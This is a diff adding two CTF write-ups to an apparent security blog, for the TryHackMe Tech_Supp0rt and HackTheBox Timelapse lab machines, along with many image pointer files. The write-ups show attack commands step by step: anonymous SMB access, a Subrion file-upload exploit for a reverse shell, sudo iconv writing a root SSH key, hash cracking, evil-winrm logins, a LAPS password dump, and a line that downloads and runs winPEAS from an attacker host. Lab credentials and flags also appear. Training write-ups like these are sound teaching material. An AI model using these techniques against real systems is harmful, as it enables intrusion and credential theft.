@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1d0bafd66a22924a800fb696b80bcaa9e1c87f4f07cd335ff7beef11631cccf0
+size 17206
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-7.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-7.png
new file mode 100644
index 0000000..ad7d22f
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:689b1249eeacb521dec3f5b300be19873e594cefb1913c6f6ebdf555b772bdf5
+size 50998
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-7.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-7.webp
new file mode 100644
index 0000000..529e713
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f12897db17120a2f241cabd0dc7a836856f65f14a247581647326d9f31de4944
+size 47376
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-8.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-8.png
new file mode 100644
index 0000000..ee7cfad
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0501034d8b8712737ef533ad03037797867d2a1338d713658120a4ba82e0ce23
+size 39530
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-8.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-8.webp
new file mode 100644
index 0000000..0f16de5
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e52403262515ceba79ce17891836066173bd5a806d8a179c1fb2c197dac65360
+size 20086
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-9.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-9.png
new file mode 100644
index 0000000..2e15dc1
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:224febff12ae24f60dbab76fd3059a1a1e68e53c6eb615fecd5c5d4626e416ff
+size 342807
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-9.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-9.webp
new file mode 100644
index 0000000..5d649f7
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3356a97284008884e0e7c53e55c312608feec893a6a9f6b84ebb6b332343290d
+size 49922
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/index.md b/content/writeup-ctf/writeup-techsupp0rt1-thm/index.md
new file mode 100644
index 0000000..2e7cc97
--- /dev/null
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/index.md
@@ -0,0 +1,162 @@
+---
+title: "Writeup - Tech_Supp0rt: 1 (THM)"
+date: 2022-05-14
+slug: "writeup-techsupp0rt1-thm"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Tech\_Supp0rt](https://tryhackme.com/room/techsupp0rt1) machine from the TryHackMe site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.222.86
+```
+Four TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 7.2p2)
+- 80/tcp : HTTP web server (Apache 2.4.18)
+- 139/tcp : Samba (3.X - 4.X)
+- 445/tcp : Samba  (3.X - 4.X)
+
+![](img/image-2.webp)
+
+## Exploit
+
+First, I start by scanning the site's folders.
+
+![](img/image-3.webp)
+
+We find 2 interesting files:
+
+![](img/image-4.webp)
+
+![](img/image-5.webp)
+
+After some research on the 2 sites, I decide to look at the smb server. For that I try to connect anonymously.
+
+![](img/image-6.webp)
+
+It works and I can get an `enter.txt` file.
+
+
+```bash
+GOALS
+=====
+1)Make fake popup and host it online on Digital Ocean server
+2)Fix subrion site, /subrion doesn't work, edit from panel
+3)Edit wordpress website
+
+IMP
+===
+Subrion creds
+|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
+Wordpress creds
+|->
+```
+In this file we learn the existence of another site in the `Subrion` folder, but in addition we are provided with credentials for it. After testing, the password doesn't seem to work. So I make a scan of the file to see if I can find something interesting:
+
+![](img/image-7.webp)
+
+A `robots.txt` file but nothing special in it:
+
+
+```bash
+User-agent: *
+Disallow: /backup/
+Disallow: /cron/?
+Disallow: /front/
+Disallow: /install/
+Disallow: /panel/
+Disallow: /tmp/
+Disallow: /updates/
+```
+So I try to decrypt the password with CyberChef. As soon as I propose the string of characters, CyberChef decodes the following string of characters: [Cyberchef](https://gchq.github.io/CyberChef/#recipe=From_Base58('123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz',false)From_Base32('A-Z2-7%3D',false)From_Base64('A-Za-z0-9%2B/%3D',true)&input=N3NLdm50WGRQRUpheGF6Y2U5UFhpMjR6YUZyTGlLV0Nr)
+
+![](img/image-8.webp)
+
+So I try to use this password.
+
+![](img/image-9.webp)
+
+Now that I am connected and I know the version of Subrion, I start looking for exploits to have a reverse shell.
+
+
+```bash
+┌──(d3vyce㉿kali)-[~]
+└─$ searchsploit subrion 4.2.1               
+---------------------------------------------------------------------------------- ---------------------------------
+ Exploit Title                                                                    |  Path
+---------------------------------------------------------------------------------- ---------------------------------
+Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting                           | php/webapps/47469.txt
+Subrion CMS 4.2.1 - 'avatar[path]' XSS                                            | php/webapps/49346.txt
+Subrion CMS 4.2.1 - Arbitrary File Upload                                         | php/webapps/49876.py
+Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)                  | php/webapps/50737.txt
+Subrion CMS 4.2.1 - Cross-Site Scripting                                          | php/webapps/45150.txt
+---------------------------------------------------------------------------------- ---------------------------------
+Shellcodes: No Results
+```
+Quickly I find a file sending exploit that would allow to get a reverse shell. I download it with the following command:
+
+
+```bash
+searchsploit -x php/webapps/49876.py > exploit.py
+```
+Then I run it with the following command:
+
+![](img/image-10.webp)
+
+Another solution to have a reverse shell would have been to use the upload page present in : content -> upload. While trying this solution I noticed that the version with the `.php` extension does not work but the `.phar` version does:
+
+![](img/image-11.webp)
+
+Searching I find that the first flag is held by the user `scamsite`. So I go to the wordpress folder to see if I can find information in the configuration files:
+
+
+```bash
+[...]
+/** MySQL database username */
+define( 'DB_USER', 'support' );
+
+/** MySQL database password */
+define( 'DB_PASSWORD', 'ImAScammerLOL!123!' );
+
+/** MySQL hostname */
+define( 'DB_HOST', 'localhost' );
+[...]
+```
+So I try to connect via SSH with this password and it works. So I can recover the first flag.
+
+![](img/image-12.webp)
+
+## Privilege escalation
+
+I start by looking at the sudo permissions:
+
+![](img/image-13.webp)
+
+My user has the right to execute the `iconv` command with root rights, so I'm looking for exploits on the GTFObin site: [iconv](https://gtfobins.github.io/gtfobins/iconv/#sudo).
+
+There is a possibility to write in a file with this command. I will write my public RSA key in the `authorized_keys` to be able to connect in SSH:
+
+
+```bash
+echo "id_rsa.pub" | sudo iconv -f 8859_1 -t 8859_1 -o /root/.ssh/authorized_keys
+
+```
+I now have a root shell and can retrieve the last flag.
+
+![](img/image-14.webp)
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Do not allow anonymous access on an SMB server
+- Do not leave passwords in accessible files
+- Do not leave executable applications with sudo root if not necessary
diff --git a/content/writeup-ctf/writeup-timelapse-htb/featured.png b/content/writeup-ctf/writeup-timelapse-htb/featured.png
new file mode 100644
index 0000000..bb6cf71
--- /dev/null
+++ b/content/writeup-ctf/writeup-timelapse-htb/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0596b3be91f30df48ce48d6167235e7c484e7c190b0a632c378746b979f4e1cd
+size 355802
diff --git a/content/writeup-ctf/writeup-timelapse-htb/featured.webp b/content/writeup-ctf/writeup-timelapse-htb/featured.webp
new file mode 100644
index 0000000..4e5bada
--- /dev/null
+++ b/content/writeup-ctf/writeup-timelapse-htb/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:21041abf5dfcedb3c8db8463d858558d4d7aaa2eaf2983886a34a5cae7108293
+size 31990
diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-1.png b/content/writeup-ctf/writeup-timelapse-htb/img/image-1.png
new file mode 100644
index 0000000..b323f90
--- /dev/null
+++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9233097338bd4e0b245b89de23a20c87bea9395db2e27d27e6aa84b047ab2021
+size 116145
diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-1.webp b/content/writeup-ctf/writeup-timelapse-htb/img/image-1.webp
new file mode 100644
index 0000000..35bf3c4
--- /dev/null
+++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6469990e67543bf3a7c0f8249ca5c5b7d806b3e12372ae1c910793e2d99eabc4
+size 105246
diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-2.png b/content/writeup-ctf/writeup-timelapse-htb/img/image-2.png
new file mode 100644
index 0000000..d36482e
--- /dev/null
+++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:7651aeb109a1258becbfdde305b76d54436bc87674a71fea83cd476eff521dee
+size 10533
diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-2.webp b/content/writeup-ctf/writeup-timelapse-htb/img/image-2.webp
new file mode 100644
index 0000000..7be2b80
--- /dev/null
+++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2460d9e67ed60abe2359b5b379bd120ee1949968b7bf6767da5b43d9447c44da
+size 18054
diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-3.png b/content/writeup-ctf/writeup-timelapse-htb/img/image-3.png
new file mode 100644
index 0000000..c1ec29c
--- /dev/null
+++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:08fadb67d7fa3dc922d072d10ea28f41463798bda6e94cd7ea3534500508487f
+size 21847
diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-3.webp b/content/writeup-ctf/writeup-timelapse-htb/img/image-3.webp
new file mode 100644
index 0000000..06cdd35
--- /dev/null
+++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:379c3dd549f467e6b96072c79a5b9d2f49f995315a84238ed0d81697d7ac0a72
+size 20040
diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-4.png b/content/writeup-ctf/writeup-timelapse-htb/img/image-4.png
new file mode 100644
index 0000000..d238385
--- /dev/null
+++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:7623584a87870ed139f149528e6c269dd37866cf867b6c42e9009b42253aaca8
+size 46237
diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-4.webp b/content/writeup-ctf/writeup-timelapse-htb/img/image-4.webp
new file mode 100644
index 0000000..766a97c
--- /dev/null
+++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e39ef3841fb2a8b5a84510fb4a8b49e33d73af50185c3d0ffe24e14fd84df479
+size 37598
diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-5.png b/content/writeup-ctf/writeup-timelapse-htb/img/image-5.png
new file mode 100644
index 0000000..1a77855
--- /dev/null
+++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:25b74453b46c258e6e5f63493d12f4980f294ab79a0618ff5ed1a7febcd3ba7a
+size 38147
diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-5.webp b/content/writeup-ctf/writeup-timelapse-htb/img/image-5.webp
new file mode 100644
index 0000000..1878ae8
--- /dev/null
+++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1d7031ccae6c8cd1e327ec4e359b7810cb725a082613af311f55119ce11a3bbb
+size 37246
diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-6.png b/content/writeup-ctf/writeup-timelapse-htb/img/image-6.png
new file mode 100644
index 0000000..662a0da
--- /dev/null
+++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:792d359151a6cbd48751800e1fcac345d158ba6a2f4637dab8a57b66e6562355
+size 32552
diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-6.webp b/content/writeup-ctf/writeup-timelapse-htb/img/image-6.webp
new file mode 100644
index 0000000..58a8385
--- /dev/null
+++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d0f088e666efc651948c318e9b8564ba4c31ebf068a0592db4782a0d2bda7162
+size 32166
diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-7.png b/content/writeup-ctf/writeup-timelapse-htb/img/image-7.png
new file mode 100644
index 0000000..ec0051c
--- /dev/null
+++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5418cd7182f072cacb0976b05a8d73ad5316b1043e743b0d4dda5a6b15a4e3ab
+size 27057
diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-7.webp b/content/writeup-ctf/writeup-timelapse-htb/img/image-7.webp
new file mode 100644
index 0000000..5348f65
--- /dev/null
+++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:981af77270afdb4a4dac7edcf2a6331acb77d45f7d7c85f13e4d65f9180ecfce
+size 23342
diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-8.png b/content/writeup-ctf/writeup-timelapse-htb/img/image-8.png
new file mode 100644
index 0000000..e2e4c2d
--- /dev/null
+++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:4c882050046d580402ff79752d2f6e76ab047422296059a951a7ae785c5ac263
+size 15697
diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-8.webp b/content/writeup-ctf/writeup-timelapse-htb/img/image-8.webp
new file mode 100644
index 0000000..2bf257f
--- /dev/null
+++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6978a194afeba668f705f7122f27d0b639470e7234155e90c2f2e3b048b87c31
+size 14688
diff --git a/content/writeup-ctf/writeup-timelapse-htb/index.md b/content/writeup-ctf/writeup-timelapse-htb/index.md
new file mode 100644
index 0000000..5a08c8c
--- /dev/null
+++ b/content/writeup-ctf/writeup-timelapse-htb/index.md
@@ -0,0 +1,149 @@
+---
+title: "Writeup - Timelapse (HTB)"
+date: 2022-04-03
+slug: "writeup-timelapse-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Timelapse](https://app.hackthebox.com/machines/Timelapse) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.129.188.205
+```
+Many TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 8.2)
+- 80/tcp : HTTP web server (Apache 2.4.41)
+
+## Exploit
+
+First I start by listing the SMB shares with the `guest` account:
+
+
+```bash
+enum4linux -a -u "guest" -p "" 10.129.188.205
+```
+![](img/image-2.webp)
+
+The `Shares` folder is available for reading, let's see what we can find in it:
+
+![](img/image-3.webp)
+
+We find two folders, in one of the two folders we find the file `winrm_backup.zip`, I download it then I try to unzip it. Problem is that it is protected by a password. Let's try to crack this password with john. To do so, I start by extracting the hash with the following command:
+
+
+```bash
+zip2john winrm_backup.zip > hash
+```
+Then I launch the dictionary attack with john with the rockyou dictionary:
+
+![](img/image-4.webp)
+
+Quickly I find that the password is `supremelagacy`. So now I can unpack the archive. In this archive I find a file with the extension `.pfx`. These files are used by windows to store certificates in `PKCS#12` format. From this file we have the possibility to retrieve the certificate and the private key (cf. [ibm.com](https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file)). To do so, I use the following commands:
+
+
+```bash
+openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out prv.key
+openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt
+```
+Problem: the certificate is also protected by a password. I test the password previously found, but without success. Once again we will have to use john to brute force the password. First I get the hash with the following command:
+
+
+```bash
+pfx2john legacyy_dev_auth.pfx > hashbis
+```
+Then I launch the dictionary attack with john :
+
+![](img/image-5.webp)
+
+I find the password `thuglegacy`, I can now extract the private key and the certificate. I then test to connect to the machine with these two files for authentication. For that I use `evil-winrm` with the following command:
+
+
+```bash
+evil-winrm -i 10.129.188.205 -S -c cert.crt -k prv.key -p -u
+```
+![](img/image-6.webp)
+
+I now have a shell with the `legacyy` user and I can get the first flag.
+
+
+```bash
+*Evil-WinRM* PS C:\Users\legacyy\Desktop> more user.txt
+6a29afecacdabd66d286759e1f1379ff
+```
+## Privilege escalation
+
+For the elevation of privilege I start by uploding winPEAS then I execute it :
+
+
+```bash
+powershell "Invoke-WebRequest -UseBasicParsing 10.10.14.173/winPEASx64.exe -OutFile winPEASx64.exe"
+./winPEASx64.exe
+```
+In the result of the program, I find that a file containing a command history exists on the machine:
+
+![](img/image-7.webp)
+
+I get it on my machine with the following command:
+
+
+```bash
+download C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
+```
+
+```bash
+whoami
+ipconfig /all
+netstat -ano |select-string LIST
+$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
+$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
+$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
+invoke-command -computername localhost -credential $c -port 5986 -usessl -
+SessionOption $so -scriptblock {whoami}
+get-aduser -filter * -properties *
+exit
+```
+Looking at the contents of the file I find a user and his password!
+
+Another thing that winPEAS teaches me is that the user svc\_deploy has the right to read the LAPS passwords attribute!
+
+
+> The "Local Administrator Password Solution" (LAPS) provides management of local account passwords of domain joined computers. Passwords are stored in Active Directory (AD) and protected by ACL, so only eligible users can read it or request its reset.
+
+So I try to do it with the [LAPSDumper](https://github.com/n00py/LAPSDumper/blob/main/laps.py) script with the following command:
+
+
+```bash
+┌──(d3vyce㉿kali)-[~/Documents]
+└─$ python3 Windows/laps.py -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -d timelapse.htb
+DC01$:J3V}8QBsB4Q6+jgveai$7}}M
+```
+The script finds the administrator password of the machine! I can now connect with the following command:
+
+
+```bash
+evil-winrm -i 10.129.188.205 -S -u Administrator -p 'J3V}8QBsB4Q6+jgveai$7}}M'
+```
+![](img/image-8.webp)
+
+I now have a shell as Administrator and I can retrieve the last flag.
+
+
+```powershell
+*Evil-WinRM* PS C:\Users\TRX\Desktop> cat root.txt
+09cec1f63345aa18fcf4bd05b9be6714
+```
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Do not allow SMB shares containing important files to be accessed by unidentified users
+- Do not use weak passwords to protect certificates
+- Do not leave files with clear passwords
diff --git a/content/writeup-ctf/writeup-timing-htb/featured.png b/content/writeup-ctf/writeup-timing-htb/featured.png
new file mode 100644
index 0000000..cdb9d1e
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d5214522a0e948f393873d7f89f8f01ea16402e449ee2b398c88fe21f9e720b6
+size 295158
diff --git a/content/writeup-ctf/writeup-timing-htb/featured.webp b/content/writeup-ctf/writeup-timing-htb/featured.webp
new file mode 100644
index 0000000..8adc1c8
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e79d340fc672ee104f27ee1e6e345a5e503cdc4d22a4241ceb4bb9ded199c631
+size 30224
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-1.png b/content/writeup-ctf/writeup-timing-htb/img/image-1.png
new file mode 100644
index 0000000..9c77084
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5a73bcfdce2c626424c8428bb85b3d2598881aaa9bc3ab24009ae5a9e2519259
+size 36941
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-1.webp b/content/writeup-ctf/writeup-timing-htb/img/image-1.webp
new file mode 100644
index 0000000..5cfde10
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:11f04dd410ca3ed966926c2c05cdbae1deaedd097a4ca050f465d67537296a05
+size 31878
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-10.png b/content/writeup-ctf/writeup-timing-htb/img/image-10.png
new file mode 100644
index 0000000..cc71754
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:04ec28497b45f522d242822d58fd181a01967ba2a6fa2e7b9a7f5773e2924804
+size 12603
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-10.webp b/content/writeup-ctf/writeup-timing-htb/img/image-10.webp
new file mode 100644
index 0000000..632eaa2
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:449c6198d69d1566f5a0b853d3cf1eb7a6a32498ed05e4a85a87065de88460db
+size 13516
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-11.png b/content/writeup-ctf/writeup-timing-htb/img/image-11.png
new file mode 100644
index 0000000..7e0ff72
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-11.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a44e150d690e7642d8f47e0f3e19b9210090ec7883effe2835ccd2efbd6dfe43
+size 14679
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-11.webp b/content/writeup-ctf/writeup-timing-htb/img/image-11.webp
new file mode 100644
index 0000000..9d3aa55
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-11.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:28510e5978ea711decd2e402e9b61491d5f3d2d82c53b07f7c5c2d1433128613
+size 15110
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-12.png b/content/writeup-ctf/writeup-timing-htb/img/image-12.png
new file mode 100644
index 0000000..6e02d05
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-12.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:860df4878701a6064ee47746b5af5f2ed77850950aa076144f86270d94f9d9c0
+size 23361
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-12.webp b/content/writeup-ctf/writeup-timing-htb/img/image-12.webp
new file mode 100644
index 0000000..ee63e7c
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-12.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f94581c7acf5dd453be8cb1cdeec15d72918d667fa3a13219f64bf2a2cc20b11
+size 23832
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-13.png b/content/writeup-ctf/writeup-timing-htb/img/image-13.png
new file mode 100644
index 0000000..e47dd28
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-13.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:8f9966e958c81f182b8c9800c97b6bc04a0f646bd7a33ba153d05c23d1c7dcb4
+size 23879
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-13.webp b/content/writeup-ctf/writeup-timing-htb/img/image-13.webp
new file mode 100644
index 0000000..96de4f2
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-13.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5b3c32a8139baf5b0b50e56e9decd398e6d3a1513e5091d0bfdf7467e59736a8
+size 19850
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-14.png b/content/writeup-ctf/writeup-timing-htb/img/image-14.png
new file mode 100644
index 0000000..fbcd453
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-14.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:7efe3dbcb31cb9c2f8ab550ab5549210e0411975305e640dd209c2b8d7b235e4
+size 38836
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-14.webp b/content/writeup-ctf/writeup-timing-htb/img/image-14.webp
new file mode 100644
index 0000000..ac148b2
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-14.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:163dc82507c3a415523eddf8ba53822c08082abe49d0be0f9bffd1521e8430f8
+size 34388
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-15.png b/content/writeup-ctf/writeup-timing-htb/img/image-15.png
new file mode 100644
index 0000000..bde166a
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-15.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:335c2fadf89b73a80fc29a9e426f43f355f227c795ff2d93eaef9f307fc368f5
+size 59756
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-15.webp b/content/writeup-ctf/writeup-timing-htb/img/image-15.webp
new file mode 100644
index 0000000..bc29497
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-15.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:dae7ebfe9ae7c481291b01bc8b96fca53b244b537bbb383d42cc8ad16791326c
+size 52702
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-16.png b/content/writeup-ctf/writeup-timing-htb/img/image-16.png
new file mode 100644
index 0000000..30e320b
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-16.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:082d9627a4a4f864eb88a7c2235eea6a6b05e381a6df43b03e946d91b4042a4f
+size 14924
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-16.webp b/content/writeup-ctf/writeup-timing-htb/img/image-16.webp
new file mode 100644
index 0000000..580cbd3
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-16.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2d1ec36813471a1a69450551fb7cf382f141198baf715e02a3a7fde328fa51ad
+size 17644
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-17.png b/content/writeup-ctf/writeup-timing-htb/img/image-17.png
new file mode 100644
index 0000000..f2ec880
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-17.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c907e51f1cef18dd28af4287b6a39b90163d41b8082be034501e0a49ff4cfd6b
+size 21008
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-17.webp b/content/writeup-ctf/writeup-timing-htb/img/image-17.webp
new file mode 100644
index 0000000..6aa515b
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-17.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:987bc8f06149ea61fe0dcc500fb95b59043f3483cf8077cd6cdfce024db9452f
+size 22906
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-18.png b/content/writeup-ctf/writeup-timing-htb/img/image-18.png
new file mode 100644
index 0000000..c65e75f
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-18.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:44c986583e28e1a780721e48f8d1cc0c1a1e74b0dd5dcf5beec6875c2b7ac798
+size 24291
